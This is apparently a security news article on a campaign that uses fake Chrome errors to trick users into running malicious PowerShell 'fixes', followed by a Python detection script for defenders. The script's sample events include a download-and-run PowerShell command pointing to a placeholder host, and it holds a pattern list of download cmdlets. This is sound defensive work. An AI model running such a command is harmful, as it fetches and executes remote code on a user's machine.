We tell you all this because a new malware distribution campaign uses fake errors in Chrome to deceive users. The aim is to get them to run malicious PowerShell "fixes" that install the malware.
In fact, this technique is spreading, and many attackers use it for the same purpose. These new attacks use JavaScript in HTML file attachments and on compromised websites to display fake Google Chrome errors while we browse the Internet.
To give you a better idea, these errors encourage the visitor to click a button that copies a PowerShell "fix" for the supposed failure. The fix is stored on the system clipboard and then executed in a Run dialog box or PowerShell window. It is important to know that these attacks require significant interaction on the part of the user; otherwise they will not succeed.
But the social engineering is clever enough to fool us with what looks like a real problem and an immediate solution. This may prompt a user to act without regard to the risk they are running. That is when the supposed PowerShell solution, which includes the dreaded malware, arrives on our PC.
This is how the virus reaches our PC from Chrome
Although a total of three attack chains have been identified, one of them could be considered the most dangerous and the most common. So that you can avoid becoming a victim, we will explain how this attack works in the Google browser.
Consider the case in which a Chrome user visits a compromised website that loads a malicious script. The script is hosted on the blockchain through the Binance Smart Chain. It then performs some checks and displays a fake error warning in Google Chrome.
The warning indicates a display problem with the web page itself. The dialog box then prompts the visitor to install a certificate by copying a PowerShell script to the Windows clipboard. At that point the script runs in a PowerShell window with administrator permissions.
When the PowerShell script runs, it performs several steps to confirm that the device is a valid target for infection. It then downloads additional payloads to infect the computer. In fact, the attackers behind this malicious campaign take advantage of users' lack of knowledge about executing PowerShell commands.
And not only that: they also take advantage of Windows' inability to detect and block these specific malicious actions. All this means that we must stay alert to messages of the type we have shown you.
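For defenders, the chain described above (PowerShell started by the user from the Run dialog, elevated, then downloading further payloads) can be hunted for in process-creation logs. The following is an added example, not part of the original article: the event field names, the sample events and the list of download cmdlets are assumptions made for illustration.

```python
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
# Cmdlets/APIs that pull remote content into the session (assumed watch list).
FETCH = re.compile(
    r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
    r"downloadfile|start-bitstransfer|net\.webclient)\b", re.I)

# Constructed events (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "integrity": "High",
     "cmdline": "powershell Invoke-WebRequest https://example.invalid/fix.ps1 | Invoke-Expression"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "integrity": "Medium",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent": r"C:\Program Files\Agent\agent.exe", "integrity": "System",
     "cmdline": "pwsh -File update.ps1 ; Invoke-RestMethod https://example.invalid/status"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def assess(ev):
    """Return (flagged, reasons) for one process-creation event."""
    if basename(ev["image"]) not in SHELLS:
        return False, []
    # explorer.exe as parent means the user launched it (Run dialog, Start menu).
    interactive = basename(ev["parent"]) == "explorer.exe"
    fetches = bool(FETCH.search(ev["cmdline"]))
    reasons = []
    if interactive:
        reasons.append("started interactively by the user")
    if fetches:
        reasons.append("command line fetches remote content")
    if ev["integrity"] in ("High", "System"):
        reasons.append("running elevated")
    # Flag only the combination the article describes: user-launched + download.
    return interactive and fetches, reasons

def flagged_events(events):
    return [i for i, ev in enumerate(events) if assess(ev)[0]]

if __name__ == "__main__":
    for i in flagged_events(SAMPLE_EVENTS):
        print(i, assess(SAMPLE_EVENTS[i])[1])
```

Only the first constructed event is flagged; an ordinary interactive PowerShell session and a download performed by a management agent are left alone.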